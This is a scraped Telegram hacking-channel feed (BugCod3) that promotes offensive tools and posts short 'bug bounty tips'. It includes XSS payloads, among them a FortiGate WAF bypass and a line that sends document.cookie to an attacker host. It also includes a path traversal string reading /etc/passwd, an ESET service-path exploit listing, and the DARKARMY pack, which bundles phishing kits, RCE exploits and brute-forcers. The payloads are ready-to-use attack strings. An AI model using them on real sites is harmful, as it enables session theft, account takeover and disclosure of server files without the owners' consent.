Subzy
💬
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Installation:
👩💻
📊 Options:
Only required flag for
⚪️
⚪️
⚪️
⚪️
⚪️
⚪️
⚪️
💻 Usage:
Target subdomain can have protocol defined, if not
⚪️ List of subdomains:
⚪️ Single or multiple targets:
😸 Github
⬇️ Download
🔒
#BugBounty #Cybersecurity #Subdomain #Takeover
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Installation:
go install -v github.com/LukaSikic/subzy@latest
Only required flag for
run subcommand(r short version) is either --target or --targets--target (string) - Set single or multiple (comma separated) target subdomain/s--targets (string) - File name/path to list of subdomains--concurrency (integer) - Number of concurrent checks (default 10)--hide_fails (boolean) - Hide failed checks and invulnerable subdomains (default false)--https (boolean) - Use HTTPS by default if protocol not defined on targeted subdomain (default false)--timeout (integer) - HTTP request timeout in seconds (default 10)--verify_ssl (boolean) - If set to true, it won't check site with invalid SSLTarget subdomain can have protocol defined, if not
http:// will be used by default if --https not specifically set to true../subzy run --targets list.txt
./subzy run --target test.google.com
./subzy run --target test.google.com,https://test.yahoo.com
BugCod3#BugBounty #Cybersecurity #Subdomain #Takeover
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3⚡2❤2🔥2
🖤
#Notifaction
Please open Telegram to view this post
VIEW IN TELEGRAM
😢6❤4👎4❤🔥2
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
Version:
Tested on OS: Microsoft Windows 10 pro x64
🕷 Exploit-db
⬇️ Download
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
https://www.eset.comVersion:
17.0.16.0Tested on OS: Microsoft Windows 10 pro x64
#Exploit #ESET #NOD32
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2👎2🔥2👍1
WAF Fortinet FortiGate XSS Bypass
Payload:
#XSS #WAF #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#XSS #WAF #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤2👍2🔥2👏2
Change IP Address Every 3 Seconds
⬇️ Download + (Readme.txt)
🔒
#Tor #Net #IP
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
BugCod3#Tor #Net #IP
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥3❤2
DARKARMY is a Collection Of Penetration Testing Tools, you will have every noscript that a hacker needs
👤 Information Gathering:
⚪️ Nmap
⚪️ Setoolkit
⚪️ Port Scanning
⚪️ Host to IP
⚪️ Wordpress User
⚪️ CMS Scanner
⚪️ XSStrike
⚪️ Dork - Google Dorks Passive Vulnerability Auditor
⚪️ Scan A server's Users
⚪️ Crips
🔓 Password Attacks:
⚪️ CUpp
⚪️ Ncrack
🛜 Wireless Testing:
⚪️ reaver
⚪️ pixiewps
⚪️ Fluxion
🌍 Exploitaition Tools:
⚪️ ATSCAN
⚪️ sqlmap
⚪️ Shellnoob
⚪️ commix
⚪️ FTP auto Bypass
⚪️ jboss-autopwn
📂 Social Engineering:
⚪️ Setoolkit
⚪️ SSLtrip
⚪️ pyPHISHER
⚪️ ZPHISHER
🧑💻 Web Hacking:
⚪️ Drupal Hacking
⚪️ Inurlbr
⚪️ Wordpress & Joomla Scanner
⚪️ Gravity From Scanner
⚪️ File Upload Checker
⚪️ Wordpress Exploit & Plugins Scanner
⚪️ Shell and Directory Finder
⚪️ Joomla! 1.5 - 3.4.5 remote code execution
⚪️ Vbulletin 5.X remote code execution
⚪️ BruteX - Automatically brute force all services running on a target
⚪️ Arachni - Web Application Security Scanner Framework
And ...
🔼 Installation:
This Tool Must Run As ROOT !!!
That's it. You can execute tool by typing DARKARMY
You can also use this tool inside the Termux of the phone
😸 Github
🎞 Youtube (Demo)
⬇️ Download
🔒
#Hacking #Tools #Pack #Penetration
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
And ...
This Tool Must Run As ROOT !!!
cd DARKARMY
chmod +x install.sh
./install.sh
That's it. You can execute tool by typing DARKARMY
You can also use this tool inside the Termux of the phone
BugCod3#Hacking #Tools #Pack #Penetration
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10❤5🔥4⚡2
Reflected XSS may lead to ATO
Payload:
Simple Tip:
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
"><noscript>alert(document.cookie)</noscript>
Simple Tip:
cat parameters.txt | grep ".php?" > php-params.txt
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
https://sub.target.com/en/test.php?vuln-param="><noscript>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</noscript#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤3⚡2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method
⬇️ Download 🌐
#BugBounty #Course #Udemy
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#BugBounty #Course #Udemy
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6⚡2👍2🔥2
Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡3
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Some times '
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Some times '
cookie' is a variable declared as 'document.cookie'#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥4❤3
Waf block any
Try HTML injection
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
"</"Try HTML injection
</a> worked...Payload:
</a<noscript>alert(document.cookie</noscript>#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2
fuzzuli
💬
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
🔼 Installation:
fuzzuli requires go1.17 to install successfully. Run the following command to install.
💻 Example:
All:
😸 Github
⬇️ Download
🔒
#Scanner #Backup #Files
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
fuzzuli requires go1.17 to install successfully. Run the following command to install.
go install -v github.com/musana/fuzzuli@latest
All:
echo https://fuzzuli.musana.net|fuzzuli -mt mixed
## OR
fuzzuli -h
BugCod3#Scanner #Backup #Files
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍3🔥3⚡2
A quick way to find "all" paths for Next.js websites:
👩💻 javanoscript:
#BugBounty #Tips #JS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
console.log(__BUILD_MANIFEST.sortedPages)console.log(__BUILD_MANIFEST.sortedPages.join('\n'));#BugBounty #Tips #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤3⚡2👍1
LazyDork Tool is Google dorker tool help during google dorking link
🔗 Site
#Google #Dork #Maker
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Google #Dork #Maker
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡5🔥2👌1
XlsNinja: Multi-Vulnerability Scanner
💬
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
📊 Features:
⚪️ LFI Scanner: Detect Local File Inclusion vulnerabilities.
⚪️ OR Scanner: Identify Open Redirect vulnerabilities.
⚪️ SQL Scanner: Detect SQL Injection vulnerabilities.
⚪️ XSS Scanner: Identify Cross-Site Scripting vulnerabilities.
⚪️ Multi-threaded scanning: Improved performance through multi-threading.
⚪️ Customizable payloads: Adjust payloads to suit specific targets.
⚪️ Success criteria: Modify success detection criteria for specific use cases.
⚪️ User-friendly command-line interface: Simple and intuitive.
⚪️ Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.
🔼 Installation:
😸 Github
⬇️ Download
🔒
#Multi #Vulnerability #Scanner
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
cd lostools
pip install -r requirements.txt
python xlsniNja.py
BugCod3#Multi #Vulnerability #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡4👍4